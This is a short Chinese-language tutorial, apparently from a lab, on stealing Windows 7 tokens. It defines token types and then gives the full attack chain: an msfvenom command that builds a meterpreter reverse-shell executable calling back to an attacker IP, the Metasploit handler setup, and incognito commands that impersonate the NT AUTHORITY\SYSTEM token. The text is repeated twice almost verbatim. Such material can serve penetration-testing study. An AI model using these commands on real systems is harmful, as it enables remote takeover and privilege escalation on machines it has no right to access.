令牌(token)
访问令牌(Access Token):表示访问控制操作主体的系统对象
会话令牌(Session Token):是交互会话中唯一的身份标识符。
密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程桌面登录访问)
Impresonation Token:模拟令牌,它是非交互的会话。
靶机:Windows7 192.168.1.15
攻击机:Kali 2021 192.168.1.16
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=7777 -f exe -o shell.exe
msfconsle msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.1.16 lhost => 192.168.1.16 msf6 exploit(multi/handler) > set lport 7777 lport => 7777 msf6 exploit(multi/handler) > exploit
打开靶机,双击生成的Shell,然后kali获取到反弹的shell
# 进入incognito use incognito # 列出令牌 list_tokens -u # 令牌假冒 SYSTEM impersonate_token 'NT AUTHORITY\SYSTEM'
# Windows7令牌窃取
令牌(token)
访问令牌(Access Token):表示访问控制操作主体的系统对象
会话令牌(Session Token):是交互会话中唯一的身份标识符。
密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程桌面登录访问)
Impresonation Token:模拟令牌,它是非交互的会话。
靶机:Windows7 192.168.1.15
攻击机:Kali 2021 192.168.1.16
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=7777 -f exe -o shell.exe
msfconsle msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.1.16 lhost => 192.168.1.16 msf6 exploit(multi/handler) > set lport 7777 lport => 7777 msf6 exploit(multi/handler) > exploit
打开靶机,双击生成的Shell,然后kali获取到反弹的shell
# 进入incognito use incognito # 列出令牌 list_tokens -u # 令牌假冒 SYSTEM impersonate_token 'NT AUTHORITY\SYSTEM'